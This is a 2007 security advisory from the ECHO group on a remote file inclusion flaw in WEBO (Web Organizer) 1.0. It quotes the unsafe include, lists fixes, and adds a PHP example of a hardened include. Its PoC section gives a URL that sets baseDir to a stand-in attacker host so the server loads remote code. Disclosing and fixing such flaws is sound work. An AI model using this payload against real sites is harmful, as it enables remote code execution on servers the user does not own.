From:erdc_(at)_echo.or.id <erdc_(at)_echo.or.id>
Date:09.03.2007
Subject:[ECHO_ADV_67$2007] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vulnerability

ECHO_ADV_67$2007

-----------------------------------------------------------------------------------------
[ECHO_ADV_67$2007] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : March, 9th 2007
Location       : Australia, Sydney
Web            : http://advisories.echo.or.id/adv/adv67-K-159-2007.txt
Critical Lvl   : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : WEBO (Web Organizer)
version       : 1.0
Vendor        : http://sourceforge.net/projects/weborganizer/
Description :

WEBO (Web Organizer) is an open-source Web application suite providing a groupware calendar, a personal address book, a shared contacts directory, and a personal desktop page.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~
- Unsafe include call in modules/abook/foldertree.php :

---------------foldertree.php--------------------------------------
<?php

/* memento :
       TreeFolder( $label, $url="", $target="", $icon = "", $id="", $options=""  )
       TreeItem( $label, $url, $target="", $icon="", $options=""  )
*/

include_once( "$baseDir/lib/HTML/tree.php");
...
------------------------------------------------------------------

The variable $baseDir is used in the include without being initialized or sanitized.
When register_globals=on and allow_url_fopen=on, an attacker can exploit this vulnerability with a simple PHP injection script.


Poc/Exploit:
~~~~~~~~~~

http://www.target.com/[webo_path]/modules/abook/foldertree.php?baseDir=http://attacker.com/evil?


Solution:
~~~~~~~

- Initialize and sanitize the $baseDir variable in the affected files.
- Turn off register_globals
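
The following is an added illustration, not WEBO's code: the include pattern from foldertree.php as written, beside a hardened form that derives the base directory from the script's own location and refuses client-supplied values. The function names and the assumption that modules/abook/ sits two directories below the application root are mine, not the project's.

```php
<?php
// Added example (not WEBO's code). Vulnerable form first: with register_globals=on,
// an unset $baseDir is silently populated from ?baseDir=..., and include_once will
// fetch a remote script when allow_url_fopen (allow_url_include on PHP >= 5.2) is on.
function vulnerable_include() {
    global $baseDir;                              // may come from GET/POST/COOKIE
    include_once("$baseDir/lib/HTML/tree.php");
}

// Hardened form: the base directory is computed, never read from the request.
function safe_base_dir() {
    // Refuse outright if a client tries to supply the variable, whatever the
    // register_globals setting; this value must never be attacker-influenced.
    foreach (array($_GET, $_POST, $_COOKIE) as $src) {
        if (isset($src['baseDir'])) {
            header('HTTP/1.0 400 Bad Request');
            exit('baseDir must not be supplied by the client');
        }
    }
    // Assumption: modules/abook/ -> application root is two levels up from this file.
    $dir = realpath(dirname(__FILE__) . '/../..');
    if ($dir === false) {
        exit('cannot resolve application root');
    }
    return $dir;
}

function safe_include() {
    $baseDir = safe_base_dir();
    $target  = realpath($baseDir . '/lib/HTML/tree.php');
    // realpath() collapses '..' and returns false for missing files; the prefix
    // check guarantees the resolved file still lives under the application root,
    // and a local path can never resolve to an http:// URL.
    if ($target === false || strpos($target, $baseDir . DIRECTORY_SEPARATOR) !== 0) {
        exit('refusing to include a file outside the application root');
    }
    include_once($target);
}
```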

---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, and my little son, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

    K-159 || echo|staff || eufrato[at]gmail[dot]com
    Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
